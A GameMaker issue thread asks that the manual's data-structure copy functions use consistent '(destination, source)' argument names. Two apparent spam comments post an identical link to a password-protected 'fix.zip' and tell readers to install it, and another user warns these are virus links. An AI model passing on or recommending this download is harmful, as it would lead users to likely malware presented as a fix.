### ISSUE TITLE
Code Editor/Manual Content: Rename the arguments for the various copy functions of data structures so they use a consistent "(destination, source)"

### ISSUE THREAD

**Issue by XanthorXIII** [YoYoGames/GameMaker-Bugs#7434]
### Description

Recently while going through the manual for Data structures I noticed that ds_grid_copy does not share the same definition as the other Data Structures.

For example ds_grid_copy is displayed as being ds_grid_copy(destination, source);

All the other Data Structure copy function
ds_list_copy( id, source );
ds_map_copy(id, source);
ds_priority_copy(id, source);
ds_queue_copy(id, source);
ds_stack_copy(id, source);
Basicially id is in place of destination

I would recommend making the same changes to the rest of the ds copy functions to make them all uniform
ds_list_copy(destination, source);
ds_map_copy(destination, source);
ds_priority_copy(destination, source);
ds_queue_copy(destination, source);
ds_stack_copy(destination, source);

Or something to indicate what the function is looking for there, like destination id and source id in the function definition

ds_grid_copy(dest id, src id);
ds_list_copy(dest id, src id);
ds_map_copy(dest id, src id);
ds_priority_copy(dest id, src id);
ds_queue_copy(dest id, src id);
ds_stack_copy(dest id, src id);

And then on the page fix the arguments to match the naming convention for the Source and Destination.

I have listed ds_list_copy as the source page but this also affects, grids, map, priority queues, queue and stack.

This serves the purpose of making it uniform between the function definitions for copy. There may be others but these stuck out to me the most.

### Manual Link

https://manual.gamemaker.io/monthly/en/GameMaker_Language/GML_Reference/Data_Structures/DS_Lists/ds_list_copy.htm

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KormexGit** [comment]
Virus links above, do not click

**Comment by caitlinrmcintyre** [comment]
Verified changes are in the manual, thanks.
